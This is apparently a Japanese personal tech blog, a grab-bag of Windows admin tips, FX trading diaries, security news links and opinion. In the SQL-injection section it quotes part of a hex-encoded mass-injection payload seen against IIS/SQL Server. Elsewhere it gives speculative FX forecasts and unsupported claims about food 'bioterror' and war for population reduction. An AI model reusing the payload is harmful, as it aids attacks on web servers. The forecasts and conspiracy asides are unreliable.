&t 時刻 (コントロール パネルの [地域と言語のオプション] で指定する形式)
&T 24 時間形式の時刻
&p 現在のページ番号
&P 総ページ数
&b 右揃えの文字列 (&b に続けて文字列を入力)
&b&b 中央揃えの文字列 (&b と &b の間に文字列を入力)
&& アンパサンド (&を表示)
スプリクトから操作出来ないのね・・・
日本HP、IE/FirefoxでWebページを無駄なく印刷「HP Smart Web Printing」v4.0
http://www.forest.impress.co.jp/article/2008/05/22/hpsmartwebprinting.html
「今最も検索されるキーワードは何?」、ヤフーが新サービス開始
http://pc.nikkeibp.co.jp/article/NEWS/20071112/286955/
サイトエクスプローラー(サイト管理者向けツール)
http://siteexplorer.search.yahoo.co.jp/
だれでもWikiサイトを構築できる「Google Sites」が正式提供
http://japan.cnet.com/news/media/story/0,2000056023,20373802,00.htm
どの都道府県から人が見に来るかがアクセス解析できる「ジオターゲティングブログパーツ」
http://gigazine.net/index.php?/news/comments/20080529_geotargeting/
IPアドレスから住所を割り出して地図表示するサービスいろいろ
http://gigazine.net/index.php?/news/comments/20070413_myipaddress/
相手のビルの衛星写真がわかる無料アクセス解析「なかのひと ベータ版」
http://gigazine.net/index.php?/news/comments/20070418_nakanohito/
FX 始めようと思って、銀行口座を作ってきた。
お金は銀行に預けるな。って事で…
引き寄せの法則
お金は銀行に預けるな
ってのを買って読んだ。どちらも読んで損は無いかと。
技術者さんは「原因」と「結果」の法則の方が気になるかも。
FX って呪文が唱えれるようになりました。
MP(マネーポイント)が足りないようなので経験値を稼ぎます。福沢さんに頑張ってもらわねば。
MP20 にて 2007.12.6 から開始。
2 日しか経ってないけど、攻略方法見つけた予感…
現時点では「なんでみんなやらないの?」って感じ。
このサイトを見に来るような技術者さんなら利益でますよきっと。。。
興味が出た人は知り合いのアフリエイトから申し込んであげて下さい…
種24万スレ過去ログ倉庫 - www.r-side.jp
2007.12.10 で +60K
調子こいて買いポジ 3 つ入れたら、全て敵だった。
3 体から痛恨の 1 撃もらってるが、まだなんとか力の盾で耐えてる状態。
力尽きるのも時間の問題か、、、
法令遵守がコンプライアンスではない 〜 パロマ事件の教訓
http://www.nikkeibp.co.jp/sj/2/special/176/index5.html
-180K のダメージを受けて、風前の灯火だったが
ホイミでなんとか回復。
痛感した。。。
あと、負のスパイラルに入ると自分の希望が前面にでちゃうので
なかなか抜け出せなくなります。
始めると必ず損しますので、それは勉強代です。
2008年のドル円相場の予想。(責任は持てません)
サブプライムの影響は予想以上で、基本円高。
ピークで 98円、 上げて 110円。 105円水準で動くんじゃないかと。
98円代は今年前半。後半から戻すんじゃないかと。。。
2009年予想。(責任は持てません)
今の日本に投資する魅力が無い事に気付き、政府が重い腰をあげる。
オリンピック以降の中国の成長が驚異的で、日本が政府系ファンドを作りスーパーセブンの仲間入なるか。
金利を引き上げて、アジアの主要通貨を目指す方針転換。
集中的に流れ込んでいる中国やロシアへの投資を日本の株に向けさせる。
ゆとり教育の過ちに気付いて、資産運用も勉強の一環に盛り込まれる。
ずばり、95円に向かう方向に流れる。
アメリカは、金融機関が見境なしに資金注入を受けたおかげで、敵対国である中国やロシアに
経済をコントロールされる懸念が高まり、事態は収まらない。
補足
日本もその事に気付いてるはずだが危機管理能力が低すぎるので
中国の政府系ファンドに機械産業乗っ取られ技術が全て持っていかれてから
慌てて対策に出るかもしれません。
が、そうなってからでは投資する価値も無いアジアの一つになっているでしょう。
FX(外国為替証拠金取引)被害、大々的に報道〜この記事をどんどん転載して広告掲載責任を問おう!
http://blog.goo.ne.jp/tokyodo-2005/e/8a270c0567191c9b5a870d88df25b26d
突然の事業休止、業界に淘汰の波到来か 過剰サービスで自滅するFX業者
http://moneyzine.jp/article/detail/92459
2008.10.4
概ね予想通りの展開になりつつありますが、何故かモリモリ資産が減少しています。orz
効率的な投資先は自分自身という事で。
皆さん、未来の自分に投資しましょう…
もっとも経済情報を見る機会は増えますので悪い事ばかりでは在りませんが。
数枚の「同一番号」中国人民元。これがなんと「本物」鑑定という、「とてつもない闇」の入り口を覗き見た
http://www.nikkeibp.co.jp/article/sj/20091204/199237/?P=1
元が基軸通貨になることは当分なさそうですね・・・
株を担保にお金を融資してくれる会社
http://web.osfnet.com/
融資不適格銘柄を掲載している。
パーソナライズ機能で特定のプログラムを一覧に表示しないようにする。
HKEY_CLASSES_ROOT\Applications\<アプリケーション名.exe>\
値の名前 : NoStartPage
データ型 : REG_SZ
値 :
※値は空白で OK
機能そのものを無効にするには、スタートを右クリックしてプロパティを開き
カスタマイズのスタートメニューに表示するプログラム数を 0 にする。
NTFS のアクセス権を初期値に戻す。
MMC を起動してスナップインの追加と削除を選択し「スタンドアロン」から追加をクリック
「利用できるスタンドアロンスナップイン」から「セキュリティの構成と分析」を選択して追加をクリック
左ペインで「\コンソールルート\セキュリティの構成と分析」を右クリックして「データベースを開く」をクリック
復元したいセキュリティデーターベースファイル(.sdb)を選択して開くをクリック
左ペインで「\コンソールルート\セキュリティの構成と分析」を右クリックして「テンプレートのインポート」をクリック
%SystemRoot%\inf\defltdc.inf(ドメインコントローラ)
%SystemRoot%\inf\defltsv.inf(サーバー)
%SystemRoot%\inf\defltwk.inf(クライント)
のいずれかのファイルを選択して開くをクリック(隠しフォルダになっている場合があります)
これで既定値に戻る。
関連
Xcacls.vbs を使用して NTFS アクセス許可を変更する方法
http://support.microsoft.com/kb/825751/ja
caclsコマンドでACLを編集する(SDDL編)
http://www.atmarkit.co.jp/fwin2k/win2ktips/726caclssddl/caclssddl.html
コマンドライン・ツール
http://www.atmarkit.co.jp/fwin2k/win2ktips/index/tipsdir/dir27000199.html
プロバイダの登録情報の確認
パスワード忘れてログインできねぇ…
で、ルータに設定してたの思い出して INPUT 項目の
パスワードを表示してる画面のソースを確認して判明。
在りがたかったが、それで良いんだろうか…
消費生活相談にみる2007年の10大項目
1.外国語学校、契約解約トラブル相次ぐ
2.食品の偽装が次々と明るみに
3.怪しい「出資」の被害、広がる
4.製品関連事故の多様化と対策強化
5.施設・設備に関連する重大事故相次ぐ
6.悪質商法に対する行政処分や摘発が相次ぐなか、特商法、割販法の改正論議進む
7.多重債務問題への対応進む
8.金融商品取引法施行、事業者の説明責任明確に
9.消費者団体訴訟制度スタート
10.「消費者トラブルメール箱」の受信件数増加
消費生活相談にみる2007年の10大項目
http://www.kokusen.go.jp/news/data/n-20071207_3.html
VISTA 対応のアプリケーション マニフェスト(.manifest)
実行ファイル名.exe.manifest (実行ファイルと同じ所へ置く)
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity
version="1.0.0.0"
processorArchitecture="X86"
name="実行ファイル名(.exe は除く)"
type="win32"
/>
<description>Description of your application</description>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="RequireAdministrator"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
※ UTF-8 で保存すること。
<requestedExecutionLevel
level="asInvoker|highestAvailable|requireAdministrator"
uiAccess="true|false"/>
という指定で、このアプリケーションの実行時に管理者権限で起動するようになります。
昇格をするためには、コードに対する署名が必要かもしれません。(x64 だけ?)
level
asInvoker
親プロセスと同じトークンで実行します。
highestAvailable
使用可能な最も高いレベルの特権を要求します。
requireAdministrator
管理者レベルの特権を要求します。
uiAccess
false
基本はこっちで。
true
別のウィンドウの UI に入力を送信する必要があるアプリケーション
Windows Vista および Windows Server 2008 アプリケーション互換性解説書
http://www.microsoft.com/japan/msdn/windowsvista/general/AppComp.aspx
最小限の特権
アプリケーションで Windows Vista のユーザー アカウント制御を有効に活用する
http://msdn.microsoft.com/msdnmag/issues/07/01/UAC/default.aspx?loc=jp
ユーザー アカウント制御
http://www.microsoft.com/japan/technet/windowsvista/security/uac.mspx
ユーザー アカウント制御の概要
http://www.microsoft.com/japan/technet/windowsvista/security/uacppr.mspx
Windows Vista ユーザー エクスペリエンス
http://www.microsoft.com/japan/msdn/windowsvista/building/ux/
セキュリティ
http://www.microsoft.com/japan/msdn/windowsvista/security/
Windows ロゴ プログラム
http://www.microsoft.com/japan/whdc/winlogo/default.mspx
Visual Studio でのマニフェスト生成
http://msdn2.microsoft.com/ja-jp/library/ms235229(VS.80).aspx
マニフェスト・ファイルをアプリケーションに組み込むには?(VS.NET)
http://www.atmarkit.co.jp/fdotnet/dotnettips/235embmanifest/embmanifest.html
「攻撃可能なポイントを最小限に」−−Service Hardening
http://itpro.nikkeibp.co.jp/article/COLUMN/20071212/289308/
.dbx ファイルの最大ファイルは 2GB ですよ。
Outlook Express で使用される .dbx ファイルの最大ファイル サイズに関する情報
http://support.microsoft.com/kb/903095/ja
旧いアイテムはときどき整理しましょう...
Thunderbird2
http://www.mozilla-japan.org/products/firefox/
は 4GB までみたい。
IMAP を利用している場合だけかもしれませんが、最後まで読めないメールがありますね。
Windows Live mail
http://get.live.com/wlmail/overview
は不明。
また、Windows Live mail は Windows XP SP2 にて、サブジェクトに「【重要】」と含まれている
メールを受信すると、そのまま何事も無かったかのように削除するみたい・・・うちだけ?
いつからそうなのか知りませんけど、Outlook Express で、本文に URL 1 行のみ書いたメールを受け取ると
URL 以外の部分でもクリック出来てしまいますね。改行を入れると再現されないから、たぶんバグ
(正確には URL の書かれている下のエリア全てでクリック可能。)
Thunderbird は IMAP を使った場合に、受信したメールの本文が途切れてたり…
Vista に Office 2000 を入れた場合は、パッチは手動です。
Office を更新する [STEP 1]
http://office.microsoft.com/ja-jp/downloads/FX101870901041.aspx
Office 製品のプロダクト サポート ライフサイクル
http://www.microsoft.com/japan/office/previous/2003/business/lifecycle.mspx
Windows インストーラアプリケーション(*.msi)をインストール後に
セーフモードからアンインストールするには
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
値の名前: MSIServer
値: Service
XP 以降の場合は REG.exe コマンドを利用して追加可能。
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MSIServer /ve /d Service
※セーフモードでは、MSIServer サービスが開始されないので
(サービスからの開始は禁止されていますので機能しません)
可能にするにはレジストリキーに追加する必要あり。
-------------------- 種類 警告
ID 2001
ソース PerfDisk
説明
システムからディスク パフォーマンス情報を読み取れません。
カウンタを表示するには、最低 1 つのディスクまたは論理ボリュームの
パフォーマンス カウンタが有効になっている必要があります。
ディスク パフォーマンス カウンタは、[ハードウェア デバイス マネージャ] の
プロパティ ページから有効にすることができます。
戻された状態コードはデータ DWORD 0 です。
--------------------
どうやら、Windows 2000 で USB Memory を使うとタイミングによっては
その後、イベントログに大量に毎日吐き出すようです。
このイベントを止めるには、再起動するしかないみたい。
件名:突然 W2kSrv で ID2001 DiskPerf 警告イベントが多発
http://www.atmarkit.co.jp/bbs/phpBB/viewtopic.php?topic=34572&forum=6&3
HTML5
HTML 5 における HTML 4 からの変更点
http://standards.mitsue.co.jp/resources/w3c/TR/2008/WD-html5-diff-20080122/
HTML5が持つ本当の意味
http://www.atmarkit.co.jp/news/200801/25/html.html
HTML5はFlashやSilverlightを不要なものにする
http://www.atmarkit.co.jp/fwcr/design/benkyo/html5_03/02.html
XP SP3
色々トラブルがあるようで。。。
Windows XP SP3 をインストールした後、Windows Update、Microsoft Update、または自動更新で更新プログラムが正常にインストールされない
http://support.microsoft.com/kb/953541
Windows XP Service Pack 3 のインストール後、再起動するたびにエラー メッセージ
"プロシージャ エントリ ポイント apsSearchInterface がダイナミック リンク ライブラリ wlanapi.dll から見つかりませんでした" が表示される
http://support.microsoft.com/kb/950720/ja
Intel のプロセッサ以外のコンピュータをWindows XP Service Pack もしくはService Pack 3
にアップグレート後、STOP 0x0000007E エラーメッセージが表示される。
http://support.microsoft.com/kb/888372/
シマンテック、Windows XP SP3導入時トラブルの回避策を説明
「SymProtect」の無効化の呼びかけと、不正なレジストリを削除するツールを準備中
http://www.computerworld.jp/topics/os/109889.html
Windows XP SP3のレジストリ破損問題、マイクロソフト作成のexeファイルが原因
http://www.computerworld.jp/topics/ms/109390.html
Windows XP SP3の不具合、今度はリモート・アクセス機能で発覚
http://www.computerworld.jp/topics/ms/108369.html
なんじゃこりゃー、stop:C0000139 unknown Hard Error
http://blogs.yahoo.co.jp/omyasanoi/20310264.html
MSがアップデートで勧告:Windows XP SP3導入でFlash Playerが脆弱に?
http://www.itmedia.co.jp/enterprise/articles/0806/03/news023.html
VISTA SP1 入れてからだったか覚えがないんですけど、USB マウスの動きが変に・・・
最近特に酷くて、左端に飛ぶんですよね、、、IME 以上に性質が悪い。
マウスを変えても症状が改善されませんでしたので USB のポートなのか、OS なのか。。。
ドコモのメールアドレス
本来、メールアドレスに使ってはいけない約束事(RFC準拠)を破ってる訳ですが
ドットを連続で入れたり、@の前にドットが有ったり、、、
一般のメールサーバからは、そういったアドレスへはメールは出せ無い訳ですが
ダブルクォートで括ると、出せたりします。
で、不思議なのがアドレスの最後にダブルクォートを付けても届く...
たとえば、 x@docomo.ne.jp を x"@docomo.ne.jp としても届いちゃいます。
(さらに複数増やした場合とかは調べてないですけども)
そーゆーもん?
メール アドレスの @ より前にピリオドがあるなど RFC に準拠していない宛先に Outlook からメッセージを送信できない
http://support.microsoft.com/kb/940620/ja
NTTドコモ、iモードメールをPCで送受信できる「iモード.net」
http://bb.watch.impress.co.jp/cda/news/21210.html
ドコモ、メールアドレスの仕様を修正 - スラッシュドット・ジャパン
http://slashdot.jp/mobile/article.pl?sid=09/04/02/2338257
※Windows7 になって Windows Live メール を利用する場合、ダブルクォートでも送信できません。
別のメールソフトにするか、ケータイのメールアドレスを変更しましょう。
ARP Spoofing(ARPポイズニング) の対策
中国セキュリティ機関のサイト攻撃、Webホスティングサービスを悪用
http://www.itmedia.co.jp/news/articles/0710/05/news026.html
ARPスプーフィング:読者のWebホスティング・サービスは守られているか
http://itpro.nikkeibp.co.jp/article/COLUMN/20071019/284979/
HTTP応答パケットを悪用するARPスプーフィング・ウイルス
http://itpro.nikkeibp.co.jp/article/COLUMN/20080125/292050/
ネットワーク機器がホームページ改ざん幇助:ARPスプーフィングの脅威
http://blog.trendmicro.co.jp/archives/1388
ipconfig /all で、Default Gateway を確認
Default Gateway に ping を叩く
arp -a で MAC アドレス確認
arp -s で 登録しなおして、dynamic から static に変更しておく。
Microsoft Message Queueing(MSMQ)
【IDM】MSMQ を使って確実なユーザー登録を行う その1 〜 MSMQ って何してくれるの?
http://blogs.technet.com/junichia/archive/2008/06/24/idm-msmq-1-msmq.aspx
IIS + SQL Server を狙った SQL インジェクション が流行ってるようですね。
最近は以下のコードの注入みたいで、よく飛んできます。
';DeCLARE%20@S%20CHAR(4000);
SET%20@S=CAST(0x4445434C4152452040542076
61726368617228323535292C4043207661726368
6172283430303029204445434C41524520546162
…削除
45205461626C655F437572736F72204445414C4C
4F43415445205461626C655F437572736F72
%20AS%20CHAR(4000));ExEC(@S);
何をやってるかは詳しく調べてませんけど、一般的な iframe+JavaScript でしょうね。
取り合えずサーバー側で保護するには URLScan 入れて Http.sys のチューニングで。
Webアプリ開発で一番重要視されなければいけない部分が、まだまだおそろかに、、、
依頼するほうも作成するほうも、勉強不足って事ですね。
最初に受け取ったデータの長さを確認してないだけのような気もしますけど...
影で PHP への無差別爆撃も始まっていたようで。
確認されているだけでも攻撃が毎分1.5件,PHPアプリ狙う攻撃が大量無差別型に
http://itpro.nikkeibp.co.jp/article/COLUMN/20081016/317141/
リンク先が .swf なスパムメールも増えてますね。これクリップボードの乗っ取り系でしょうね。
setClipboard() で 悪質 URL に誘導するタイプかな。IE だけじゃなく、Firefox や Opera もアウト。
クリップボードを乗っ取る悪質Flash広告が登場
http://slashdot.jp/security/article.pl?sid=08/08/21/230212
URLをコピペしたら悪質サイトに――乗っ取り被害が続出
http://www.itmedia.co.jp/enterprise/articles/0808/20/news033.html
偽のアンチウイルスソフト(ミスリーディングアプリケーション)サイトにでも繋げるんでしょうかね。
↓だったみだいです。
偽のセキュリティ対策ソフトを買わないで、IPAが警戒呼び掛け
http://www.itmedia.co.jp/enterprise/articles/0809/02/news085.html
中国向けサイトを狙ったSQLインジェクション攻撃
http://itpro.nikkeibp.co.jp/article/COLUMN/20080826/313473/
「SQLインジェクション」と呼ばれるサイバー攻撃はどのようなものか取材しました。
http://www.fnn-news.com/news/headlines/articles/CONN00142634.html
パスワードを盗むウイルスが急増、半数は「オンラインゲーム」を狙う
http://itpro.nikkeibp.co.jp/article/NEWS/20080829/313755/
悪質なFlashリダイレクタ
http://itpro.nikkeibp.co.jp/article/COLUMN/20080916/314817/
アドビ、Flash Playerの「クリック乗っ取り」対策を公表
http://itpro.nikkeibp.co.jp/article/NEWS/20081008/316444/
クッキーに隠されたSQLインジェクション、対策は?
http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/008.html
これで汚染されるサーバーは明らかに、手抜きされたコードが原因でしょう。
ちゃんと作成出来る会社に依頼&納品前の脆弱性チェックをしない方が悪いですね。
そもそも他に(アプライアンス含めて)頼りすぎてる気が…
自社作成アプリとして軽く作っている場合でも、コードの安全性とその寿命も考慮しないとね。
派遣会社で質が悪い所は、未経験者を研修1か月で送っていますしね。
広く浅くの間に合わせの知識では、自分たちの首を絞める事に…
分業によってスキルを失ったSEとプログラマ
http://el.jibun.atmarkit.co.jp/jibun/2008/10/se-9465.html
http://el.jibun.atmarkit.co.jp/karyu/2008/10/sepg1-acb2.html
http://el.jibun.atmarkit.co.jp/karyu/2008/10/sepg2-0e2d.html
インターネット規模の中間者攻撃が明らかに--BGPの信頼性に問題
http://japan.cnet.com/news/sec/story/0,2000056024,20382238,00.htm
WEPは一瞬で解読――ニンテンドーDSはどうなる
http://www.itmedia.co.jp/news/articles/0810/17/news083.html
MAC アドレスが偽装されるって事を知らない人が多いんでしょう。
ルーターとか普通に変更出来るんですけどね…
「WEPを数秒で解読」報道を受け、総務省も注意喚起
http://internet.watch.impress.co.jp/cda/news/2008/10/21/21258.html
パスワード付きの PDF ファイル。
開く度にパスワード求められるのと、サーバーに送信される(インターネット端末じゃないと駄目)だから、なんとかならない?
って相談を受けた。一つ開いておけば違うファイルを開いても聞かれ無いから、誤って消さないように隠せない?って話。
セキュリティ的にどうよ?って話は IT 中心では無い業界の人には無縁。
.hta を作成して IE を起動し、その中で PDF を開いて隠せば?
という事で簡単なサンプル作成。
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<TITLE>PDF常駐アプリ</TITLE>
<HTA:APPLICATION
APPLICATIONNAME = "HTA_Sample"
BORDER = "dialog"
BORDERSTYLE = "normal"
CAPTION = "yes"
CONTEXTMENU = "no"
ICON = "Estelle.ico"
ID = "oCheck"
INNERBORDER = "no"
MAXIMIZEBUTTON = "no"
MINIMIZEBUTTON = "yes"
NAVIGABLE = "yes"
SCROLL = "no"
SCROLLFLAT = "yes"
SELECTION = "no"
SHOWINTASKBAR = "yes"
SINGLEINSTANCE = "no"
SYSMENU = "yes"
VERSION = "1.0.0"
WINDOWSTATE = "normal"
/>
</HEAD>
<STYLE>
BODY { background: #CCC; }
</STYLE>
<SCRIPT Language="VBScript">
Option Explicit
Dim ie
Dim element
' Application開始時イベント
Sub Window_OnLoad
Window.ResizeTo 320,240
cmdIeOpen.value = "表示"
cmdIeVisible.value = "隠す"
cmdClose.value = "閉じる"
End Sub
Sub cmdIeOpen_OnClick
On Error Resume Next
If isObject(ie) = False Then
Set ie=CreateObject("InternetExplorer.Application")
End If
ie.Navigate("about:blank")
ie.Document.open
ie.Document.write msg.InnerHTML
ie.Document.close
ie.Visible=True
End Sub
Sub cmdIeVisible_OnClick
If isObject(ie) Then
ie.Visible = False
End If
End Sub
'閉じるボタンのクリックイベント
Sub cmdClose_OnClick
Window.Close
End Sub
</SCRIPT>
<BODY bgcolor="#CCCCCC" onLoad="VBScript:Window.ResizeTo 320,240">
<P>
PDF ファイルを IE を使って開きます。<br>
非表示の状態でこのアプリを終了した場合は、タスクマネージャーから IE を終了する必要があります。<br>
<INPUT type="button" name="cmdIeOpen">
<INPUT type="button" name="cmdIeVisible">
</P>
<P><INPUT type="button" name="cmdClose"></P>
<!-- PDF を開くためのエレメント -->
<div id="msg" style="display:none;">
<embed src='./sample.pdf' width='100%' height='100%'></embed>
</div>
<!-- ここまで -->
</BODY>
</HTML>
hta 作成時の参考サイト
http://tuka.s12.xrea.com/index.xcg?p=HTA
.hta を終了して、パスワード付きの PFD を開き閉じた後に再度開くと、又パスワード聞かれるらしいから微妙。
それじゃ、タスクトレイにでも入れておいたら?って事で。。。
最小化時にタスクトレイに入るアプリ探して終了。(たぶん)
あー、hta は、Wscript.Echo や Wscript.Sleep などのコマンドが使えないんだったっけ。
http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/oct05/hey1031.mspx
wmi 使えば Sleep モドキは可能かな。
VISTA + IE7 の場合、Navigate や Navigate2 で開くと複数開いてくるんですよねぇ。
保護モードを解除すると、ちゃんと動くみたいですけど。
それを調べてたら新しいウインドやら、タブで開くってのがありました。
Const NAVOPENINNEWWINDOW = &H1
Const NAVOPENINNEWTAB = &H0800
Const NAVOPENINBACKGROUNDTAB = &H1000
ie.Navigate2 URL, NAVOPENINNEWWINDOW + NAVOPENINNEWTAB
こんな感じ。
Vistaの保護モードで、CreateObject("InternetExplorer.Application")を使う。
http://scripting.cocolog-nifty.com/blog/2008/06/vistacreateobje_2574.html
委託先が信用できない
http://itpro.nikkeibp.co.jp/article/NC/20080825/313380/?ST=NC
「添付ファイルはパスワード付き暗号化」でいいのか
http://itpro.nikkeibp.co.jp/article/OPINION/20080901/313857/
---------------------------------------------------------------------
実行ファイルのパスを取得、指定ファイルの存在確認(.hta VBScript)
Dim objFS, strFLD
Set objFS = CreateObject("Scripting.FileSystemObject")
strFLD = objFS.GetFolder(".") '実行ファイルのパス取得
If flExpar("config.ini") Then '「config.ini」が存在するか確認
'存在する場合の処理
Else
msgbox "初期設定ファイルが見つかりませんでした。"
Window.Close
End If
Function flExpar(fname)
Dim fn
fn= objFS.BuildPath(strFLD,fname)
If objFS.FileExists(fn) Then
flExpar = True
Else
flExpar = False
End If
End Function
---------------------------------------------------------------------
「保護期間よりも問題は違法コピー」ドワンゴ川上会長
http://internet.watch.impress.co.jp/cda/news/2008/08/28/20678.html
フレッツスクエアみたいに閉鎖的空間を作って、さらにアンチウイルス製品みたいに3台まで入れれます。みたいな?
接続先を数セッション張れるなら、実現できそうだけども。
総務省、著作権料を気にせず既存の映像や音楽を自由に加工できる空間をインターネット上に創設へ
http://gigazine.net/index.php?/news/comments/20080825_cyber_free/
Windows Home Server 日本語版
http://www.watch.impress.co.jp/akiba/hotline/20080830/etc_msev0.html
一般受けすると構築サービスとか出てきたりするのかな。
将来的にはアプリを全部詰め込んで、PC端末はシンクライアント
アプリは必要に応じて呼び出す、、、なんてのが理想かな。
Citrixの掲げる仮想化戦略が結実 “デスクトップの仮想化“で実現するシンクライアントの最終形
http://special.nikkeibp.co.jp/ts/article/0h0i/100942/
今使っているクライアント端末はイメージ化してサーバーにアップ
専用のBootCDから接続する、ってサービスもそのうち出てきそうですね。
日本HP,3万円を切ったシンクライアント端末を投入
http://itpro.nikkeibp.co.jp/article/NEWS/20080925/315483/
マイクロソフト、Windowsのクラウド版「Windows Azure」を正式発表
http://japan.cnet.com/news/ent/story/0,2000056022,20382661,00.htm?ref=rss
発表された…
ユーザーに暗黙の管理負担を強いるPCの使い方を変える――マイクロソフト (1/2)
http://www.itmedia.co.jp/enterprise/articles/0810/29/news011.html
が、定着するには5年は必要でしょうね…
以前勤めていた会社では、LANに2回線(光とYBB)使ってDHCPで優先順位つけて運用していましたけど
そこまでする会社はまだ少ないでしょうね…
バブルが崩壊した後に起きること
http://www.nikkeibp.co.jp/it/article/COLUMN/20081026/317777/
デル、企業向けデスクトップでセキュリティ機能を強化
http://www.itmedia.co.jp/enterprise/articles/0810/30/news041.html
今後はデスクトップアプリがターゲット。
ガジェットなども注意が必要でしょうね。
OSよりアプリケーションへの攻撃が増加、MSがセキュリティ報告書
http://internet.watch.impress.co.jp/cda/news/2008/11/04/21400.html
[PDC 2008]Windows 7ではリモート・デスクトップを強化,動画やゲームも再生可能に
http://itpro.nikkeibp.co.jp/article/NEWS/20081031/318233/
Microsoft、仮想化をプライベートクラウドの基盤と位置付け
http://techtarget.itmedia.co.jp/tt/news/0811/12/news06.html
メール用パスワードの復旧サービス〜パスワード破りの新潮流?
http://itpro.nikkeibp.co.jp/article/COLUMN/20081111/319058/?ST=security&P=1
次はメールサーバは自前で用意するのが主流になり
無料サービスは使わないって流れになるんでしょうかねー
不明なシステムデバイス
デュアル CPU で組むと、一つ見つからないのかな?
Intel(R) 631xESB/6321 ESB LPC Interface Controller でした。
ちなみに、DELL の SC1430
「日本人が優しすぎるから」――ニコ動で“育つ”香港の歌姫 (1/3)
http://www.itmedia.co.jp/news/articles/0809/05/news080.html
プロより歌が上手い人、いるもんですねぇ。
いい話でした。
「工業用糊に限り販売」 農水省の説明は大ウソだった
http://www.j-cast.com/2008/09/11026863.html
最近話題の事故米転用はバイオテロみたいな物ですねぇ。(米の基準値だけやたら厳しく設定されているのも・・・)
役人やってる犯罪者を何とかしないと、日本はちっとも良くなりませんね。
福田総理が辞任するのも判りますよ。
こういう話題の裏には、もっと大きなネタの存在を隠蔽する目的もあるのかも。
社保庁の年金問題が消えかけていますし・・・
そういえば半年〜1年程前だったか、毎日食べてる食パンの味が妙に違う時が3か月程ありました。
なんだか化粧品っぽい香りが口一杯に広がって嫌な感じでしたが、、、
今思えば、これもチャイナリスクだったのかも知れませんね。
あやうく殺されかけてたのかも。。。
手作りを1斤買った方が味も質も安心感も全く違いますね。(値段も倍近く変わりますけど…)
原材料に中国産を使って大量生産している製品の品質管理ってどうなってるんでしょうかね。
ちゃんと出来上がった物の味の確認してるんでしょうかね…
喫茶店のテーブルゲーム
昔は良く見かけましたが、、、マージャン等で役満でコーヒーチケットとか。。。
IT 化が進んだことですし、応用して新たな広告市場に出来そうな気がしませんかね。
携帯と連動とかも面白そうです。。。ネットカフェとは違う方向で・・・
メディア化するポータルが瀕死の雑誌を飲み込もうとしている
http://japan.cnet.com/column/pers/story/0,2000055923,20381140,00.htm
間違っているオバマが勝ち、正しいマケインが負けそうな件
http://blogpal.seesaa.net/article/107406416.html
石油産業と軍事産業に癒着がある方が勝つのですよ。
今まさに瓦解する市場原理主義
http://www.nikkeibp.co.jp/sj/2/column/o/154/
既に始まっている食糧危機をどうするか、、、
次に流動資金が流れるのは、そっちじゃないでしょうかね。
このまだと、日本は兵糧攻めに合うのでは…
世界同時食糧危機 第1回 アメリカ依存の食が破綻する日 (仮)
http://www.nhk.or.jp/special/onair/081017.html
東京円:続伸 1ドル97円台、ユーロも一時124円台
http://mainichi.jp/select/today/news/20081023k0000e020017000c.html
ファンドにしてやれている韓国とアイスランド、今後どうなるんでしょうかね。
アイスランドは、魚で返すとか言い出しそう。
「禁じ手」を使わざるを得ない米国 / SAFETY JAPAN [大前 研一氏] / 日経BP社
http://www.nikkeibp.co.jp/sj/2/column/a/158/index2.html
戦争起こして世界人口減らしにきますよ…
地球の人口は 66億7千6百万人で1分間に140人増えている(在ってる?)
中国とインドをなんとかしないと穀物食い潰される訳ですけど。
「VANITY FAIR」誌が発表した米国資産家の損失額ランキング
1.シェルドン・アデルソン(ラスベガスのカジノ王)
249億米ドル / 約2兆4900億円
2.ウォルトン一族(ウォルマートの創業者一族)
211億米ドル / 約2兆1100億円
3.ウォーレン・バフェット(有名な投資家)
163億米ドル / 約1兆6300億円
4.セルゲイ・ブリン、ラリー・ペイジ(Google社の共同創業者)
121億米ドル / 1兆2100億円
5.ビル・ゲイツ(マイクロソフト社の創業者)
120億米ドル / 約1兆2000億円
韓国株式市場、政府の対策も効果なし(上)
http://www.chosunonline.com/article/20081023000018
韓国、ロシアは、今後どうなるんでしょうね。
金融危機は「勝負の時」
http://trendy.nikkeibp.co.jp/article/column/20081105/1020624/
音楽産業(音楽の神様だった小室哲哉氏)もそうですけど、過去の偉業が大きすぎた事により時代の変化に対応出来ていませんよね。
TV も変わるタイミングを完全に逃しちゃいましたので周りから変えていくしか無いですね。(Wiiとか頑張ってますよね)
今のくだらない放送しかしないTVを見ているのは、やる事の無い人だけって気付いているのでしょうかね。
とは言え、嘘の情報を真実に変える力は健在のようですけど。。。
トヨタ奥田氏「厚労省たたきは異常。マスコミに報復も」
http://www.asahi.com/national/update/1112/TKY200811120346.html
ご立腹のようで。
頭の固い年寄りの影響力が強すぎるんでしょう、どの業界も。
まずは消費者が、もう少し賢くならないといけませんよね。良識も常識もあったもんじゃない。
日テレ・テレ東が三十数年ぶり赤字 CM落ち込む
http://www.asahi.com/business/update/1113/TKY200811130264.html
予算削減でさらに品質劣化確定ですか。
長音記号
慣れてないので、まだ書き漏れますねぇ。。。
マイクロソフト製品ならびにサービスにおける外来語カタカナ用語末尾の長音表記の変更について
http://www.microsoft.com/japan/presspass/detail.aspx?newsid=3491
マイクロソフト ランゲージ ポータル
http://www.microsoft.com/language/ja/jp/download.mspx
会社が倒産して早3か月が過ぎました…
Oracle と JAVA の技術者、.NET 化する為の開発者を求めている会社が多いです。
Oracle は脆弱性だらけでパッチが当てられないイメージなのですけど、世の中 Oracle なんですかね。
自社製品を持っていない受注開発のみの会社も、将来の成長は余り望めそうに無いように思えますし
未経験者歓迎と書かれている会社は、安い賃金でロボットみたいな人材を求めていますし。
それでは7Kで嫌煙されても仕方ないですね。
IT企業では無い店舗を複数持っている企業では、末端までPCの取り扱いの教育をされてないのが現状ですし
情報漏えいを起こした場合に会社が傾くという事を判って無いようで、そういう会社は間違いなく自滅しますね。
